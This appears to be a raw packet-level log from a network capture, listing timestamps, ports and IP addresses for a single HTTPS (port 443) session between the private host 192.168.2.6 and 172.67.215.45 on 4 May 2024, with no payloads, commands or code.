May 4, 2024 09:48:41.852538109 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.852607965 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.852613926 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.852741003 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.853534937 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.853555918 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.853616953 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.853626013 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.853669882 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.855592966 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.855609894 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.855667114 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.855675936 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.855721951 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.859605074 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.859646082 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.859683037 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.859689951 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.859708071 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.859713078 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.859731913 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.859739065 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.859743118 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.859775066 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.859807968 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.860723019 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.860738039 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.860790014 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.860796928 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.860832930 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.862763882 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.862780094 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.862827063 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.862833977 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.862870932 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.863802910 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.863822937 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.863852024 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.863858938 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.863883972 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.863897085 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.865334988 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.865350962 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.865405083 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.865412951 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.865453959 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.866456985 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.866472006 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.866528988 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.866535902 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.866579056 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.868469954 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.868488073 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.868545055 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.868551970 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.868587017 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.869491100 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.869505882 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.869554043 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.869560003 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.869590044 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.869604111 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.871397018 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.871412992 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.871474028 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.871480942 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.871540070 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.872065067 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.872832060 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.872849941 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.872901917 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.872909069 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.872944117 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.874141932 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.874155998 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.874202013 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.874207973 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.874245882 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.875050068 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.875062943 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.875125885 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.875132084 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.875169039 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.876734972 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.876755953 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.876811981 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.876821995 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.876858950 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.878456116 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.878473043 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.878523111 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.878532887 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.878570080 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.879322052 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.879338980 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.879399061 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.879407883 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.879451036 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.879555941 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.879570961 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.879610062 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.879616022 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.879648924 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.879664898 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.882405996 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.882422924 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.882469893 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.882478952 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.882518053 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.883651018 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.883666039 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.883707047 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.883713007 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.883737087 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.883750916 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.885215998 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.885231972 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.885270119 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.885279894 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.885309935 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.885323048 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.886266947 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.886282921 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.886337042 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.886347055 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.886390924 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.887923956 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.887939930 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.887984991 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.887991905 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.888016939 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.888056040 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.889781952 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.889796972 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.889843941 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.889852047 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.889878988 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.889902115 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.890546083 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.890559912 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.890608072 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.890614033 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.890640020 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.890662909 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.891665936 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.891681910 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.891743898 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.891750097 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.891779900 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.891801119 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.892723083 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.892739058 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.892782927 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.892787933 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.892818928 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.892834902 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.893590927 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.893605947 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.893663883 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.893671036 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.893716097 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.894596100 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.894610882 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.894653082 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.894658089 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.894686937 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.894709110 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.895921946 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.895942926 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.895983934 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.895992041 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.896018982 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.896039009 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.896949053 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.896964073 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.897018909 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.897025108 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.897068024 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.897732973 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.897748947 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.897793055 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.897797108 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.897825956 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.897840023 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.898906946 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.898921967 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.898963928 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.898968935 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.898998976 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.899019957 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.899749041 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.899763107 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.899807930 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.899811983 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.899835110 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.899858952 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.900768042 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.900784969 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.900829077 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.900834084 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.900866985 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.901679993 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.901700020 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.901732922 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.901740074 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.901757002 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.901791096 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.902761936 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.902779102 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.902829885 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.902837038 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.902879953 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.903728962 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.903745890 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.903788090 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.903793097 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.903804064 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.903836966 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.904560089 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.904576063 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.904617071 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.904622078 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.904649973 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.904668093 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.905543089 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.905558109 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.905606031 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.905611992 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.905638933 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.905658960 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.906759977 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.906775951 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.906843901 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.906850100 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.906897068 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.907574892 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.907588959 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.907643080 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.907649040 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.907682896 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.908636093 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.908655882 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.908689022 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.908694029 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.908720970 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.908730030 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.909487963 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.909519911 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.909543991 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.909548998 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.909574032 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.909593105 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.910603046 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.910624027 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.910665989 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.910671949 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.910710096 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.911529064 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.911545038 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.911592007 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.911597967 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.911633968 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.912523031 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.912539005 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.912584066 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.912590027 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.912606001 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.912627935 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.913461924 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.913475990 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.913527012 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.913533926 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.913572073 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.914463997 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.914479017 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.914530039 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.914535046 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.914568901 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.915380001 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.915394068 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.915441990 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.915447950 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.915483952 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.916450024 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.916465998 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.916507006 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.916513920 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.916549921 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.917027950 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.917042017 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.917088032 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.917093992 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.917135000 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.917922020 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.917937040 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.917980909 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.917987108 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.918004990 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.918023109 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.919236898 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.919251919 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.919286013 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.919291019 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.919318914 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.919331074 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.920169115 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.920186043 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.920239925 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.920247078 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.920285940 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.921236992 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.921251059 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.921288013 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.921293974 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.921320915 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.921328068 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.921776056 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.921789885 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.921839952 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.921847105 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.921883106 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.922956944 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.922971964 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.923051119 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.923057079 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.923100948 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.923100948 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.924034119 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.924050093 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.924096107 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.924108028 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.924148083 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.924947977 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.924969912 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.925018072 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.925028086 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.925066948 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.925928116 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.925944090 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.925981045 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.925987005 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.926012993 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.926029921 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.926810980 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.926831961 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.926857948 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.926863909 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.926907063 CEST	49708	443	192.168.2.6	172.67.215.45
